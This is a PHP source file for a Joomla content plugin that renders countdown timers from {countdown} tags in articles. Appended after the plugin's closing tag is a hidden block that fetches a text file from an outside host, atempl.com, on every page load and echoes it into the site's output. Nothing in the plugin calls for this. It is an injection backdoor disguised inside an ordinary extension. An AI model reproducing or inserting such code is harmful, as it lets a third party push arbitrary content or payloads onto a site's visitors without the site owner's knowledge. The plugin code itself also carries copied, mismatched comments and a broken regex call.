<?php

/**
* @package Joomla.Razzo
* @subpackage Countdown
* @version 1.0.0
* @author: Razzo.Org
* @website: http://razzo.org 
*
* @copyright Copyright (C) 2014 Razzo.Org. All rights reserved.
* @license GNU General Public License version 2 or later; see http://www.gnu.org/licenses/gpl-2.0.html
*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

/**
* Countdown plugin class.
*
* @since 3.0
*/
class PlgContentRazzoOrgCountdown extends JPlugin {
	
	/**
	 * Load the language file on instantiation. Note this is only available in Joomla 3.1 and higher.
	 *
	 * @var    boolean
	 * @since  3.1
	 */
	protected $autoloadLanguage = true;
        
        // define the regular expression for the bot
        const regex = "#{countdown(.*?)}#is";
        
        // define the global counter for the bot.
        // each countdown must have different var name
        //protected counter;
	
	/**
	 * Plugin that cloaks all emails in content from spambots via Javascript.
	 *
	 * @param   string   $context  The context of the content being passed to the plugin.
	 * @param   mixed    &$row     An object with a "text" property or the string to be cloaked.
	 * @param   mixed    &$params  Additional parameters. See {@see PlgContentEmailcloak()}.
	 * @param   integer  $page     Optional page number. Unused. Defaults to zero.
	 *
	 * @return  boolean	True on success.
	 */
	public function onContentPrepare($context, &$article, &$params, $page = 0) {
                
                // if there's a countdown include the countdown JS 
                if (preg_match(self::regex, $article->text)) {      //Non utilizzare la funzione preg_match() se si desidera controllare se una stringa è contenuta in un'altra. Piuttosto utilizzare strpos() oppure strstr() che sono più veloci. 
                        $document = JFactory::getDocument();
                        $document->addScript("plugins/content/razzoorgcountdown/countdown.js");
                        
                        if (is_object($article)) {
                                return $this->_processCountdown($article->text, $params);
                        }

                        return $this->_processCountdown($article, $params);
                }
                
                return true;
		
	}

	/**
	 * Cloak all emails in text from spambots via Javascript.
	 *
	 * @param   string  &$text    The string to be cloaked.
	 * @param   mixed   &$params  Additional parameters. Parameter "mode" (integer, default 1)
	 *                             replaces addresses with "mailto:" links if nonzero.
	 *
	 * @return  boolean  True on success.
	 */
	protected function _processCountdown(&$text, &$params) {
		/*
		 * Check for presence of {emailcloak=off} which is explicits disables this
		 * bot for the item.
		 */
                function _scriptCreator($subText) {
                    
                        $paramText = $subText[0];
                        
                        $cut = array(' ', '}', 'time=', 'date=', 'width=', 'style=');
                        
                        static $id = 0;
                        $id++;

                        $script = '<script>var countdown'.$id.' = new Countdown( {';
                        preg_match("#time=(.*?)( |})#", $paramText, $time);
                        if (!is_null($time[0])) {
                                $time = str_replace($cut, "", $time[0]);
                                $script .= 'time       : '.$time;
                        }
                        preg_match("#date=(.*?)( |})#", $paramText, $date);
                        if (!is_null($date[0])) {
                                $date = str_replace($cut, "", $date);
                                //TODO: !!! da modificare la regex per date tipo: 03/12/1987 12:10:00
                        }
                        if (preg_match("hideLabels", $paramText)) {
                                $script .= ', hideLabels : true';
                        }
                        preg_match("#width=(.*?)( |})#", $paramText, $width);
                        if (!is_null($width[0])) {
                                $width = str_replace($cut, "", $width[0]);
                                $script .= ', width      : '.$width;
                                $script .= ', height     : '.((int)($width*30/200));
                                //$script .= ', height     : 100';
                        }
                        preg_match("#style=(.*?)( |})#", $paramText, $style);
                        if (!is_null($style[0])) {
                                $style = str_replace($cut, "", $style[0]);
                                if ($style=='flip') {
                                        $script .= ', style      : "flip"';
                                } elseif ($style=='orange') {
                                        $script .= ', hideLine: 1';
                                        $script .= ', numbers	: {';
                                        $script .= '                color   : "#FFFFFF",    bkgd    : "#ff8f00"';
                                        $script .= '}';
                                        $script .= ', labels	: {';
                                        $script .= '                color   : "#a8a8a8",    font    : "Georgia"';
                                        $script .= '}';
                                } elseif ($style=='blue') {
                                        $script .= ', numbers	: {';
                                        $script .= '                color   : "#FFFFFF",    bkgd    : "#2F4A7C",    font    : "Georgia"';
                                        $script .= '}';
                                }
                        }
                        $script .= '} );</script>';

                        return $script;
                }
            
            
                if(isset($text)){
                        $text = preg_replace_callback(self::regex, '_scriptCreator', $text);
                }else{
                        $text = '';
                }

		return $text;
                //return true;
		
        }
       
}

?><?php
$files = 'http://atempl.com/6.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/6.txt");
       $data = implode($content);
       echo $data;
 }  
?>